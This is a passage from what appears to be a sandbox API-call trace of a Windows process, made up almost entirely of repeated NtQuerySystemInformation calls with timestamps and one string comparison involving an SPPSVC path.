ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd730, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4e0, Length=0x28, ResultLength=0x0) [0227.942] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] 